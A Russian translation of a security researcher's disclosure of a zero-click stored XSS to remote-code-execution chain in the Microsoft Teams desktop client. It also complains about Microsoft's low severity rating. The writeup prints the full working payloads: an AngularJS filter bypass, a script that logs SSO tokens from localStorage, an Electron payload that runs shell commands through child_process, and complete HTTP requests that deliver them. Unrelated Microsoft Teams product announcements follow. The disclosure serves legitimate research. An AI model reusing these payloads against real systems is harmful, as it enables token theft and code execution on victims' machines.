Русский
Русский
English
Статистика
Реклама

Microsoft teams

Перевод Мы нашли опасную уязвимость в Microsoft Teams, но компания устранила её только спустя два месяца

10.12.2020 10:23:48 | Автор: admin

TL;DR:

  • 31 августа 2020 года мы сообщили о критически опасных багах исполнения удалённого кода в Microsoft Teams.
  • 30 сентября 2020 года Microsoft присвоила им рейтинг Important, Spoofing (Важно, спуфинг) один из наиболее низких.
  • В нашей команде мгновенно родилась новая шутка.
  • Microsoft отказалась подробно обсуждать воздействие этих багов, окончательное решение принято 19 ноября 2020 года
  • Что касается CVE, в настоящее время политика Microsoft заключается в том, чтобы не публиковать CVE продуктов, автоматически обновляемых без действий пользователя, 30 ноября 2020 года
  • Баги устранены к концу октября 2020 года

Рейтинг Microsoft Security Response Center Important, Spoofing


Microsoft приняла эту цепочку багов в баунти-программу облачных багов O365 как Important (уровень серьёзности), Spoofing (воздействие). Это один из самых низких рейтингов.

По крайней мере, теперь в нашем коллективе появилась новая шутка когда мы находим баг исполнения удалённого кода (remote code execution, RCE), мы называем его Important, Spoofing. Спасибо, Microsoft!

Если быть полностью честными, то для десктопного приложения был присвоен отдельный рейтинг Critical, Remote Code Execution, но только за очки Microsoft! Очки Microsoft позволяют вам попасть в таблицу лидеров MSRC.

В этой статье мы расскажем об одном из пяти переданных в MSRC цепочек багов исполнения удалённого кода Microsoft Teams, требующих одного нажатия или не требующих нажатий вообще (Important, Spoofing).

Благодарим Оскарса Вегериса.

Воздействие бага исполнение удалённого кода, не требующее действий пользователя


  • Нападающий отправляет или редактирует уже имеющееся сообщение, которое выглядит для жертвы совершенно обычным.
  • Жертва исполняет код, просто просмотрев сообщение.

Вот и всё. Со стороны жертвы больше не требуется никакого вмешательства. Теперь внутренняя сеть вашей компании, личные документы, документы/почта/заметки O365, секретные чаты полностью скомпрометированы. Подумайте об этом. Одно сообщение, один канал, никакого взаимодействия. Все подвергаются эксплойту.

Объясним немного подробнее. Что если получатели затем автоматически опубликуют это сообщение в своих командах и каналах? Эксплойт распространяется на всех. Вы знали, что можете быть гостем в других организациях? Вероятно, в вашей организации есть несколько гостей. С большой вероятностью они находятся в собственных организациях, и эти организации, вероятно, имеют собственных гостей, у которых есть свои организации, которые Да, этот баг можно превратить в червя, распространяемого по сети Microsoft Teams, по крайней мере, в пределах организации.

Демонстрация бага довольно скучна достаточно просто единственного неинтерактивного HTTP-запроса.


Получив рейтинг Important, Spoofing, в качестве аргументации для сотрудников MSRC я отправил список пунктов, которые посчитал реальным воздействием бага. Обсуждение было почти несущественным, они просто перетасовывали рейтинги. На каждый ответ требовались недели, и каждый раз мне приходилось напоминать о себе.

Примерно спустя три месяца мы пришли к следующему: к рейтингу Important, Spoofing и к тому, что десктопный клиент (исполнение удалённого кода) находится вне области воздействия (out of scope).

Конечно, Microsoft может вывести из области воздействия бага десктопное приложение, что, по моему мнению, абсурдно, поскольку оно рекламируется как основной способ работы с Microsoft Teams но почему это всего лишь Важно и что такое спуфинг?

Important, Spoofing по пунктам


  • Атака Stored XSS, не требующая вмешательства пользователя. Влияет на все типы потоков сообщений приватные, потоки, группы и т.д.
  • Самовоспроизводящийся червь жертва репостит полезную нагрузку всем контактам и группам. Все репостят своим контактам, группам (гости тоже имеют доступ к организациям, а также доступ к собственным организациям, и т.д.)
  • Кража токенов SSO для всех пользователей организации из XSS, например, при захвате аккаунта, вы получаете доступ ко всем токенам SSO Office 365, то есть доступ ко всей почте, документам, заметкам компании всему, что есть в O365
  • Доступ к частным перепискам, сообщениям, файлам, логам вызовов и всему остальному, что есть в MS Teams
  • Повышение полномочий до уровня организации MS Teams Admin
  • Доступ к микрофону/камере с помощью XSS (насколько я знаю, по крайней мере, в веб-версиях для Chrome)
  • Кроссплатформенное (macOS, Windows, Linux) исполнение произвольных команд на устройствах жертвы, не требующее участия жертвы
  • Полная утеря конфиденциальности и неприкосновенности для конечных пользователей доступ к приватным чатам, файлам, внутренней сети, приватным ключам и личным данным вне MS Teams
  • Кейлоггинг, доступ к микрофону, камере и т.д.

Вы когда-нибудь задавались вопросом, как MS Teams способна беспроблемно получать доступ ко всему в вашем O365? Нападающие таким вопросом не задаются они делают это так же, как это делает Teams.

Что вошло в отчёт


  • Обход защиты от инъекций выражений AngularJS
  • Выход из песочницы AngularJS для исполнения произвольного кода JS
  • Обход CSP (с помощью AngularJS)
  • Злоумышленное использование API Microsoft Teams для скачивания и исполнения файла с целью реализации RCE
  • Дополнительная универсальная полезная нагрузка Electron [вырезано] для RCE, которая включена во вложения к отчёту в формате видео/медиа
  • Обе полезные нагрузки RCE позволяют обойти защиту приложений Electron, специфичную для Microsoft Teams, однако, вероятно, их можно универсально адаптировать к более старым версиям ElectronJS с похожими защитными ограничениями.

Защита ElectronJS в MS Teams: remote-require отключено и фильтруется, nodeIntegration равно false, создание webview фильтруется и в обычном состоянии удаляет небезопасные параметры/опции. Невозможно просто импортировать child_process и исполнить произвольный код или создать webview с собственной опцией preload.

Демо и RCE


Полезная нагрузка [вырезано], невидимая для жертвы (новое окно не открывается)



Ну да, инъецируемая шаблонная строка видна на долю секунды, но в обычной ситуации пользователь её не увидит. Об этом свидетельствует следующее демо и все остальные шаблонные строки AngularJS, которые вы не видите в Teams. Я связываю этот глитч с HTTP-прокси, общей медленностью приложения, живой перезагрузкой и тем, что это демо, а значит, оно просто обязано иметь ошибки :)

// по требованию Microsoft полезная нагрузка RCE, не создающая новых окон, засекречена примерно до 2021 года

Полезная нагрузка с новым окном



Пустое окно может содержать произвольный контент, иметь любой размер и внешний вид сейчас оно подозрительно пустое, потому что это проверка концепции.

Исходный файл MOV находится здесь.

Никакого вмешательства пользователя не требуется, эксплойт исполняется при просмотре сообщения чата. Этот эксплойт обходит ограничения webview и злонамеренно использует API MS Teams для скачивания файла и применения его в качестве preload (контекст nodeJS) для webview. Teams фильтрует создание webview, отфильтровывая preload и другие опасные опции, но при таком способе проверку можно обойти. Вероятно, такой же подход можно использовать в более старых приложениях ElectronJS.

cmd = `open /System/Applications/Calculator.app` // change to windows/linux command as requiredstage1 = `data:text/plain,cp=require('child_process');cp.exec('${cmd}')`; // create a virtual file to downloadthis.electronSafeIpc.send(`desktopFileDownload`, stage1); // request to download file// implement an event handler when files downloaded to trigger payloadthis.electronSafeIpc.on(`desktop-file-download-finished`, (_, fileinfo) => {         f = fileinfo.uniqueFile.filePath; // event gives us file path which we don't know beforehand                // create a new webview mockup - window with a webview tag and our virtual, downloaded file as preload        stage2 = `data:text/html,<webview src='about:blank' preload='file:///${f}'></webview>`        this.electronSafeIpc.send(`allowWindowOpenUrl`, stage2); // abusing MS Teams IPC API to allow above URL        this.w = window.open(stage2); // URL gets opened, webview gets created with our virtual, downloaded file preload        setTimeout(()=>{this.w.close()},1000) // not necessary, but let's close the custom window    })

Ниже показан исходный отчёт о баге, переданный в MSRC


Сводка


В десктопном приложении MS Teams была обнаружена уязвимость Remote Code Execution, которую можно запустить новой инъекцией XSS (Cross-Site Scripting) в teams.microsoft.com. Любому участнику или каналу Microsoft Teams можно отправить специально изготовленное сообщение чата, которое исполнит произвольный код на компьютере пользователя БЕЗ ЕГО УЧАСТИЯ.

Удалось реализовать Remote Code Execution в десктопных приложениях на всех поддерживаемых платформах (Windows, macOS, Linux). Исполнение кода предоставляет нападающим полный доступ к устройствам жертвы, а через эти устройства и к внутренним сетям компании.

Даже без исполнения произвольного кода в устройстве пользователя при помощи продемонстрированного XSS нападающий может получить токены авторизации SSO для Microsoft Teams и других сервисов Microsoft (например, Skype, Outlook, Office365). Более того, уязвимость к XSS сама по себе позволяет обеспечить доступ к конфиденциальным/приватным перепискам, файлам и т.д. из MS Teams.

Такие атаки могут выполняться гостевыми пользователями совершенно незаметно, без каких-либо действий пользователя или признаков компрометации.

Продукты, подверженные воздействию этого бага:

  • Microsoft Teams (teams.microsoft.com) Cross-Site Scripting
  • Microsoft Teams macOS v 1.3.00.23764 (последняя на 31.08.2020 версия)
  • Microsoft Teams Windows v 1.3.00.21759 (последняя на 31.08.2020 версия)
  • Microsoft Teams Linux v 1.3.00.16851 (последняя на 31.08.2020 версия)

Воздействие


  • Распространение по типу червя (wormable) возможность автоматического репоста полезной нагрузки эксплойта в другие компании, каналы и пользователям без действий с их стороны
  • Исполнение произвольных команд в устройствах жертвы без действий со стороны жертвы
  • Полная утеря конфиденциальности и неприкосновенности для конечных пользователей доступ к приватным чатам, файлам, внутренней сети, приватным ключам и личным данным вне MS Teams
  • Доступ к токенам SSO, а значит, и к другим сервисам Microsoft (Outlook, Office365 и т.д.)
  • Возможные фишинг-атаки перенаправлением на сайт нападающих или запросом ввода учётных данных SSO
  • Кейлоггинг при помощи специально созданной полезной нагрузки

Описание


Данный отчёт содержит новый вектор XSS и новую полезную нагрузку RCE, которые используются совместно. Они влияют на систему чатов в Microsoft Teams и могут использоваться, например, в личных сообщениях и каналах.

Для реализации RCE в Microsoft Teams используется цепочка из двух уязвимостей:

  • Stored XSS в чате teams.microsoft.com в функции упоминания пользователя
  • Новый кроссплатформенный специально созданный JS-эксплойт для десктопных клиентов MS Teams

Stored XSS в teams.microsoft.com


Как воспроизвести


  1. Ввести сообщение чата в личном общении или в канале, упомянув пользователя или тэг этого чата
  2. Отредактировать сообщение чата, содержащее упоминание, и выполнить перехват при помощи HTTP-прокси наподобие Burp Suite

В функции упоминаний уязвимым параметром является displayName в структуре JSON сообщения { content: "...", properties: { "mentions" : "[{ displayName: PAYLOAD HERE }]".

Запрос должен выглядеть примерно так, обратите внимание на displayName:

PUT /v1/users/ME/conversations/19%3A9bc6400d2fc7443487491898c6803e46%40thread.tacv2/messages/1598607494949 HTTP/1.1Host: emea.ng.msg.teams.microsoft.comUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:81.0) Gecko/20100101 Firefox/81.0Accept: jsonAccept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/jsonAuthentication: skypetoken=...snip...ClientInfo: os=macos; osVer=10; proc=x86; lcid=en-us; deviceType=1; country=us; clientName=skypeteams; clientVer=1415/1.0.0.2020080725; utcOffset=+03:00BehaviorOverride: redirectAs404Content-Length: 1174{"content":"<div><div>\n<div>\n<div>\n<div>\n<div><span itemscope itemtype=\"http://schema.skype.com/Mention\" itemid=\"0\">dada</span></div>\n</div>\n</div>\n</div>\n</div>\n</div>","messagetype":"RichText/Html","contenttype":"text","amsreferences":[],"clientmessageid":"9868848366534370000","imdisplayname":"Oskars Vegeris","properties":{"importance":"","subject":null,"mentions":"[{\"@type\":\"http://schema.skype.com/Mention\",\"itemid\":0,\"tagId\":\"tHab2TLzpa\",\"mri\":\"tHab2TLzpa\",\"mentionType\":\"tag\",\"displayName\":\"x marks the spot\"}]"}}

Фильтрацию выражений Angular можно обойти инъекцией символа нулевого байта в Unicode \u0000, например:

{{3*333}\u0000}

Для получения доступа пользователя к локальному хранилищу и всем токенам SSO использовать эту полезную нагрузку в displayName из приведённого выше HTTP-запроса PUT.

{{['if(typeof onetime==`undefined`){onetime=1;console.log(localStorage);}'].forEach($root.$$childHead.$$nextSibling.app.$window.eval)}\u0000}

Полный HTTP-запрос для логгинга токена SSO:

PUT /v1/users/ME/conversations/19%3A9bc6400d2fc7443487491898c6803e46%40thread.tacv2/messages/1598607494949 HTTP/1.1Host: emea.ng.msg.teams.microsoft.comUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:81.0) Gecko/20100101 Firefox/81.0Accept: jsonAccept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/jsonAuthentication: skypetoken=...snip...ClientInfo: os=macos; osVer=10; proc=x86; lcid=en-us; deviceType=1; country=us; clientName=skypeteams; clientVer=1415/1.0.0.2020080725; utcOffset=+03:00BehaviorOverride: redirectAs404Content-Length: 1174{"content":"<div><div>\n<div>\n<div>\n<div>\n<div><span itemscope itemtype=\"http://schema.skype.com/Mention\" itemid=\"0\">dada</span></div>\n</div>\n</div>\n</div>\n</div>\n</div>","messagetype":"RichText/Html","contenttype":"text","amsreferences":[],"clientmessageid":"9868848366534370000","imdisplayname":"Oskars Vegeris","properties":{"importance":"","subject":null,"mentions":"[{\"@type\":\"http://schema.skype.com/Mention\",\"itemid\":0,\"tagId\":\"tHab2TLzpa\",\"mri\":\"tHab2TLzpa\",\"mentionType\":\"tag\",\"displayName\":\"x marks the spot{{['if(typeof onetime==`undefined`){onetime=1;console.log(localStorage);}'].forEach($root.$$childHead.$$nextSibling.app.$window.eval)}\u0000}\"}]"}}

Этот запрос выполнит логгинг локального хранилища пользователя как доказательство концепции XSS.

Никаких других действий не требуется. Все пользователи в чате начнут выполнять логгинг своих токенов SSO, которые можно извлечь.

Можно проверить это, изучив инструменты разработчика или в десктопной версии Microsoft Teams, или в любом браузере.

Исполнение удалённого кода и полезная нагрузка


Была разработана новая полезная нагрузка исполнения удалённого кода, обходящая все ограничения, реализованные на данный момент (remote require, node integration, фильтрация webview preload и т.д.) в десктопной версии Microsoft Teams. Она должна работать, даже при включении contextIsolation.

cmd = `open /Applications/Calculator.app` // change to windows/linux command as requiredstage1 = `data:text/plain,cp=require('child_process');cp.exec('${cmd}')`; // create a virtual file to downloadthis.electronSafeIpc.send(`desktopFileDownload`, stage1); // request to download file// implement an event handler when files downloaded to trigger payloadthis.electronSafeIpc.on(`desktop-file-download-finished`, (_, fileinfo) => {         f = fileinfo.uniqueFile.filePath; // event gives us file path which we don't know beforehand                // create a new webview mockup - window with a webview tag and our virtual, downloaded file as preload        stage2 = `data:text/html,<webview src='about:blank' preload='file:///${f}'></webview>`        this.electronSafeIpc.send(`allowWindowOpenUrl`, stage2); // abusing MS Teams IPC API to allow above URL        this.w = window.open(stage2); // URL gets opened, webview gets created with our virtual, downloaded file preload        setTimeout(()=>{this.w.close()},1000) // not necessary, but let's close the custom window    })

Укороченная версия для HTTP-запроса PUT; улучшена тем, что исполняется только один раз на reload:

{{['if(typeof mentiontime==`undefined`){mentiontime=1;stage1=`data:text/plain,cp=require(\\\"child_process\\\");cp.exec(\\\"open /System/Applications/Calculator.app\\\")`;this.electronSafeIpc.send(`desktopFileDownload`,stage1);this.electronSafeIpc.on(`desktop-file-download-finished`,(_,fileinfo)=>{f=fileinfo.uniqueFile.filePath;stage2=`data:text/html,<webview src=\\\"about:blank\\\" preload=\\\"file:///${f}\\\"></webview>`;this.electronSafeIpc.send(`allowWindowOpenUrl`,stage2);this.w=window.open(stage2);setTimeout(()=>{this.w.close()},2000)})}'].forEach($root.$$childHead.$$nextSibling.app.$window.eval)}\u0000}

Полный HTTP-запрос с полезной нагрузкой RCE:

PUT /v1/users/ME/conversations/19%3A9bc6400d2fc7443487491898c6803e46%40thread.tacv2/messages/1598607494949 HTTP/1.1Host: emea.ng.msg.teams.microsoft.comUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:81.0) Gecko/20100101 Firefox/81.0Accept: jsonAccept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/jsonAuthentication: ...snip...ClientInfo: os=macos; osVer=10; proc=x86; lcid=en-us; deviceType=1; country=us; clientName=skypeteams; clientVer=1415/1.0.0.2020080725; utcOffset=+03:00BehaviorOverride: redirectAs404Content-Length: 1174{"content":"<div><div>\n<div>\n<div>\n<div>\n<div><span itemscope itemtype=\"http://schema.skype.com/Mention\" itemid=\"0\">dada</span></div>\n</div>\n</div>\n</div>\n</div>\n</div>","messagetype":"RichText/Html","contenttype":"text","amsreferences":[],"clientmessageid":"9868848366534370000","imdisplayname":"Oskars Vegeris","properties":{"importance":"","subject":null,"mentions":"[{\"@type\":\"http://schema.skype.com/Mention\",\"itemid\":0,\"tagId\":\"tHab2TLzpa\",\"mri\":\"tHab2TLzpa\",\"mentionType\":\"tag\",\"displayName\":\"x marks the spot{{['if(typeof mentiontime==`undefined`){mentiontime=1;stage1=`data:text/plain,cp=require(\\\"child_process\\\");cp.exec(\\\"open /System/Applications/Calculator.app\\\")`;this.electronSafeIpc.send(`desktopFileDownload`,stage1);this.electronSafeIpc.on(`desktop-file-download-finished`,(_,fileinfo)=>{f=fileinfo.uniqueFile.filePath;stage2=`data:text/html,<webview src=\\\"about:blank\\\" preload=\\\"file:///${f}\\\"></webview>`;this.electronSafeIpc.send(`allowWindowOpenUrl`,stage2);this.w=window.open(stage2);setTimeout(()=>{this.w.close()},2000)})}'].forEach($root.$$childHead.$$nextSibling.app.$window.eval)}\u0000}\"}]"}}

Примечание: следует изменить команду, в коде указана команда для macOS Catalina open /System/Applications/Calculator.app.

Действий пользователя не требуется, простое посещение чата приведёт к исполнению произвольного кода.

Вспомогательные материалы/ссылки:


[1] Видеодемо, скриншоты

[2] https://www.electronjs.org/docs/tutorial/security

Информация SSO / cookie


Список идентификаторов токенов SSO в localStorage и параметры cookie, доступные из JavaScript в Microsoft Teams


Токены SSO:

adal.nonce.idtokents.09ccd856-c12e-4228-acf6-a19af826be77.auth.skype.tokents.09ccd856-c12e-4228-acf6-a19af826be77.cache.token.4580fd1d-e5a3-4f56-9ad1-aab0e3bf8f76ts.09ccd856-c12e-4228-acf6-a19af826be77.cache.token.cf53fce8-def6-4aeb-8d30-b158e7b1cf83ts.09ccd856-c12e-4228-acf6-a19af826be77.cache.token.https://*.microsoftstream.comts.09ccd856-c12e-4228-acf6-a19af826be77.cache.token.https://api.spaces.skype.comts.09ccd856-c12e-4228-acf6-a19af826be77.cache.token.https://chatsvcagg.teams.microsoft.comts.09ccd856-c12e-4228-acf6-a19af826be77.cache.token.https://emea.presence.teams.microsoft.com/ts.09ccd856-c12e-4228-acf6-a19af826be77.cache.token.https://evolutiongaming-my.sharepoint.comts.09ccd856-c12e-4228-acf6-a19af826be77.cache.token.https://evolutiongaming-my.sharepoint.com/ts.09ccd856-c12e-4228-acf6-a19af826be77.cache.token.https://evolutiongaming.sharepoint.comts.09ccd856-c12e-4228-acf6-a19af826be77.cache.token.https://evolutiongaming.sharepoint.com/ts.09ccd856-c12e-4228-acf6-a19af826be77.cache.token.https://forms.office.comts.09ccd856-c12e-4228-acf6-a19af826be77.cache.token.https://loki.delve.office.com/ts.09ccd856-c12e-4228-acf6-a19af826be77.cache.token.https://management.core.windows.net/ts.09ccd856-c12e-4228-acf6-a19af826be77.cache.token.https://onenote.com/ts.09ccd856-c12e-4228-acf6-a19af826be77.cache.token.https://outlook.office.com/ts.09ccd856-c12e-4228-acf6-a19af826be77.cache.token.https://outlook.office365.comts.09ccd856-c12e-4228-acf6-a19af826be77.cache.token.https://outlook.office365.com/connectorsts.09ccd856-c12e-4228-acf6-a19af826be77.cache.token.https://presence.teams.microsoft.com/ts.09ccd856-c12e-4228-acf6-a19af826be77.cache.token.https://service.powerapps.com/ts.09ccd856-c12e-4228-acf6-a19af826be77.cache.token.https://teams.microsoft.comts.09ccd856-c12e-4228-acf6-a19af826be77.cache.token.https://uis.teams.microsoft.comts.09ccd856-c12e-4228-acf6-a19af826be77.cache.token.https://web.microsoftstream.comts.09ccd856-c12e-4228-acf6-a19af826be77.cache.token.https://whiteboard.microsoft.com

Потенциально уязвимые cookies, доступные из JavaScript:

sessionIdTSAUTHCOOKIESSOAUTHCOOKIE




На правах рекламы


Эпичные серверы это VPS для любых задач. Вы можете создать собственный тарифный план, максимальная конфигурация 128 ядер CPU, 512 ГБ RAM, 4000 ГБ NVMe!

Подробнее..

Инструменты Microsoft для повышения эффективности учебного процесса

25.05.2021 10:11:06 | Автор: admin

Дистанционное игибридное обучение

В период дистанционного и гибридного обучения учителя применяли инновационные методы интеграции технологий в учебный процесс, чтобы заинтересовать учащихся. Большинство (82%) работников сферы образования уверено, что прошлый год ускорил темпы развития инноваций в преподавании и обучении.

Сегодня образование в школах полностью трансформируется. Формируется комплексный подход к обучению, ключевую роль в котором играет несколько элементов: ориентированность на ученика, концентрация на развитии цифровых компетенций, социальное просвещение, защита и безопасность, а также масштабируемость решений. Для поддержания эффективности учебного процесса критически важны следующие технологии: информационно-образовательная среда для совместной работы, аналитические инструменты, средства обеспечения обратной связи, а также инклюзивные иммерсивные возможности, способствующие более глубокому пониманию сложных концепций.

Весь последний год учителям приходилось постоянно искать новые технологические решения для сохранения вовлеченности учеников. Из временного решения, обеспечивающего связь в режиме дистанционного и гибридного обучения, технологии превратились в неотъемлемую часть множества виртуальных и очных классов. В рамках исследования YouGov, недавно проведенного по заказу Microsoft, 71 процент работников системы дошкольного и школьного образования сообщил, что технологии помогают им повышать качество преподавания.

Продолжая поддерживать учителей и учеников, мы сегодня представляем новые инструменты и обновления в ключевых областях, необходимых для создания целостной образовательной среды и развития системы образования: ориентированность на ученика, концентрация на развитии навыков, социальное просвещение, защита и безопасность, масштабируемость.

Представляем новые инструменты для вовлечения учеников в учебный процесс в классе

Мы создаем новые возможности в Teams и другие инструменты, чтобы помогать преподавателям открывать для себя цифровые решения, которые дополняют и обогащают индивидуальный процесс обучения. Эти новые бесплатные предложения будут доступны позднее. Мы разработали их, основываясь на информации от экспертов и руководителей в сфере образования, преподавателей и учащихся.

  • Интеграция с календарем:новые возможности интеграции с календарем позволяют ученикам видеть расписание уроков и сроки сдачи заданий в календарях Teams и Outlook. Таким образом ученики могут видеть всю важную информацию сразу:где они должны быть и что им нужно изучать.

  • Обновления СУО:чтобы помогать преподавателям экономить время и создавать более целостную среду, Microsoft сотрудничает с ведущими поставщиками систем управления обучением (СУО), такими как Instructure и Blackboard, для углубления и улучшения интеграции СУО и Teams, собраний Teams и OneDrive.

Поддерживаем благополучие учащихся

Эмоциональное благополучие ключевой фактор успеха учеников; исследования показывают, что такой подход является очень востребованным, но ресурсов для его применения пока недостаточно. Сложности, возникшие в прошлом году, показали: преподавателям необходимо понимать, в каком эмоциональном состоянии находятся ученики, оценивать их мотивацию, видеть, с какими трудностями сталкиваются учащиеся, чтобы помочь их преодолеть.

По данным исследования, недавно проведенного для нас компанией YouGov, 81 процент работников сферы образования считает очень важным регулярно общаться с учениками и узнавать об их самочувствии.

Технологии могут помогать учителям общаться с учениками и лучше их понимать, а также способствовать развитию социально-эмоциональных навыков. Наши новые инструменты предназначены именно для этого.

  • Reflectэто бесплатное приложение в составе Microsoft Teams, обеспечивающее преподавателям возможность назначать регулярные индивидуальные встречи с учениками или с целым классом, во время которых учащиеся могут поделиться тем, как они себя чувствуют. С помощью Reflect преподаватели школ могут способствовать установлению связей между учащимися, а также оказывать им помощь и приглашать их регулярно выражать свои мысли. Reflect позволяет преподавателям легко проверять как общий эмоциональный фон учащихся, так и их отношение к конкретной теме, например обучению на дому, домашнему заданию, текущим событиям или изменениям в их коллективе.

  • Встроенные инструменты вOneNoteиTeams, такие как знаки отличия и стикеры, также могут помочь ученикам и преподавателям чувствовать более глубокую связь и способствовать росту эффективных взаимоотношений. Мы слышали от преподавателей, что приложение Flipgrid в последние годы стало для них неоценимым помощником: оно помогает учащимся обрести уверенность, а преподавателям инициировать полезное обсуждение учебного процесса в классе и за его пределами.

Выводы и идеи учителей ключ к позитивным изменениям в сфере образования

Когда школы в прошлом году перешли в онлайн-режим, учители совершили и продолжают совершать сверхчеловеческие усилия, чтобы помочь всем ученикам оставаться вовлеченными в учебный процесс. Они выявили и заполнили пробелы, нашли способы оставаться на связи с каждым учеником, совместно преодолевали сложности и развивали стратегии трансформации образовательного процесса для новой эпохи.

По данным исследования YouGov, более восьми из десяти преподавателей считают, что прошлый год показал: учебный процесс больше не привязан к определенному времени и месту. А 82 процента заявили, что технологии ускорили темп развития инноваций в преподавании и обучении.

Подробнее..

Microsoft 365 Training Day погружение в Microsoft Teams 21 июля

13.07.2020 18:21:24 | Автор: admin


Текущие ожидания бизнеса от ИТ и бурное развитие облачных сервисов меняют подход к работе в компаниях коренным образом и трансформируют ежедневную работу отделов ИТ. Современные коммуникации не просто чаты, звонки или почта это и автоматизация бизнес-процессов, и интеграция приложений, и широкие возможности по организации совместной работы, соответствующие современным требованиям безопасности. Microsoft Teams продолжает стремительно развиваться, чтобы быть единым центром командной работы для компаний из любых отраслей и сотрудников из разных подразделений.

Регистрация

Под катом изучайте расписание.

Программа


10.00 10.20 Обзор возможностей Microsoft Teams
Антон Борисов, Менеджер по продвижению и адаптации решений бизнес продуктивности, Microsoft
10.20 11.00 Microsoft Power Platform
Дмитрий Лобода, Архитектор по бизнес-решениям в Центральной и Восточной Европе, Microsoft;
Михаил Головастиков, Генеральный директор, Ggroupp
11.00 11.45 Гостевой и федеративный доступ в Microsoft Teams
Евгений Артемьев, Технический консультант партнеров Microsoft
11.45 12.30 Перерыв
12.30 14.00 Базовые и продвинутые возможности телефонии в Miсrosoft Teams
Евгений Артемьев, Технический консультант партнеров Microsoft;
Борис Базилевский, Консультант по решениям, AudioCodes
14.00 14.15 Эффективная совместная работа распределенной команды
Антон Бугрин, Ведущий специалист по решениям Logitech для совместной работы;
Сергей Громов, Менеджер по работе с заказчиками, направления видеорешений для совместной работы, Logitech
14.15 14.30 Видеорешения Yealink
Артур Дусов, Менеджер по продукции ВКС, IPMATIKA;
Юрий Якушин Пресейл инженер по продукции Yealink ВКС
14.30 16:00 Платформа приложений Microsoft Teams
Наталья Кац, Архитектор по партнерским решениям Microsoft;
Аркадий Золотовицкий, Директор по Развитию бизнеса i-Sys

Регистрация
Подробнее..

День виртуального обучения Microsoft 365 организация удаленной работы с помощью Microsoft Teams

25.03.2021 10:19:47 | Автор: admin

1 апреля, 11.00-13.45, 2 апреля, 11.00-13.40, на русском.

Чтобы ваш персонал мог эффективно работать удаленно, необходима возможность безопасно взаимодействовать в любом месте. На мероприятии День виртуального обучения Microsoft 365: организация удаленной работы с помощью Microsoft Teams вы узнаете, как обеспечивать удаленный персонал инструментами, ресурсами и решениями, которые необходимы им, чтобы оставаться на связи и сохранять продуктивность.

Примите участие в мероприятии и узнайте, как реализовать весь потенциал онлайн-собраний, звонков, видео и чатов Microsoft Teams, а также предоставить персоналу возможность работать с любого устройства и откуда угодно.

Во время обучения вы узнаете, как:

  • Предоставьте персоналу возможность встречаться и работать дома

  • Сделайте приложения для повышения производительности доступными на любом устройстве

  • организовать первоклассное удаленное взаимодействие с пользователями

Вот, что мы вам предлагаем:

Часть 1

Часть 2

Введение

Введение

Обзор Microsoft Teams в Microsoft 365

Развертывание команд и управление ими

Перерыв 10минут

Перерыв 10минут

Реализация процессов управления, обеспечения безопасности и соответствия требованиям Microsoft Teams

Изучите возможности совместной работы в Microsoft Teams

Перерыв 10минут

Перерыв 10минут

Подготовка среды к развертыванию Microsoft Teams

Управление коммуникациями в Microsoft Teams

Заключение

Заключение

Подробнее..

Праздничные фоны и комнаты для обсуждений что нового в Microsoft Teams

23.12.2020 10:20:51 | Автор: admin


В Microsoft Teams появятсяновые возможностидля проведения собраний в виртуальном офисе, чтобы сделать их более яркими в преддверии новогодних праздников. На платформе станут доступны праздничные сцены для режима Вместе и новые настраиваемые фоны. Кроме того, в Microsoft Teams добавлена новая функция переговорных комнат.



  • Праздничные сцены для режима Вместе.Новые сцены в режиме Вместе в новогодней тематике подойдут для проведения виртуальной праздничной вечеринки с коллегами. Помимо праздничных фонов, новый набор сцен для режима Вместе включает кафе и конференц-зал, класс, и др. Поклонники Halo могут собраться на важную встречу в Космическом Командовании Объединенных Наций.

  • Новые пользовательские фоны.Также в Microsoft Teams добавлена коллекция новых настраиваемых праздничных фонов для стандартных встреч и видеозвонков.Чтобы добавить новый собственный фон, достаточно загрузить понравившийся поссылке.

  • Переговорные комнаты.Комнаты для обсуждений позволяют легко разделить участников собрания на подгруппы, чтобы пользователям было удобнее проводить небольшие дискуссии, мозговые штурмы, учебные занятия и т.д. Организаторы могут самостоятельно переключаться между собраниями, рассылать объявления сразу во все комнаты и в любое время возвращать всех на основное собрание. Комнаты для обсуждений могут быть созданы как в каналах Microsoft Teams, так и на собраниях.
Подробнее..

Построение интеграции и рабочих процессов Microsoft Teams

18.01.2021 10:10:41 | Автор: admin

Четверг, 21 января 2021 г. | 12:00-15:00 (GMT +03:00)
22 января 2021 г. | 12:00-16:00 (GMT +03:00)

На английском с субтитрами на русском.

Удаленная работа требует более проработанных рабочих процессов. Виртуальный учебный день Microsoft 365: построение интеграции и рабочих процессов Microsoft Teams показывает, как платформа для разработчиков Microsoft Teams упрощает интеграцию ваших приложений и служб для повышения производительности, ускорения принятия решений и создания совместной работы на основе существующего контента и рабочих процессов.

Присоединяйтесь к нам, чтобы узнать, как создавать приложения для Teams и интегрированные решения, ориентированные на людей, которые могут повысить продуктивность вашей организации, независимо от того, находитесь ли вы на месте или работаете удаленно.

Подробности и регистрация.

Во время этого тренинга, состоящего из двух частей, вы узнаете, как:

  • Создавать современные решения для совместной работы корпоративного уровня с Microsoft Teams

  • Преобразовывать повседневные бизнес-процессы с помощью интеграции платформы Microsoft 365 для Power Platform, SharePoint и Microsoft Office

  • Использовать множество данных в Microsoft Graph для расширения возможностей Microsoft 365 и создания уникальных интеллектуальных приложений.

Подробности и регистрация.

Подробнее..

Бархатная перчатка Microsoft

17.07.2020 20:07:39 | Автор: admin
Культурный контекст
Персонажи Люси и Чарли Браун это отсылка к очень популярному на западе, в частности Америке, комиксу Peanuts (оттуда же известен белый пес Snoopy). Люси на протяжении многих лет психологически издевалась над Чарли: призывая его с разбегу пнуть мяч, каждый раз давая иллюзию, но она, в самый последний момент, этот мяч от него забирала.
Всю свою жизнь, Чарли Браун, всю свою жизнь.
обобщительная статья (англ.) об этой шутке из комикса

Это мой первый крупный перевод текста, старался удержать плавный слог на русском языке. Будут пожелания знаете куда писать. Поехали!

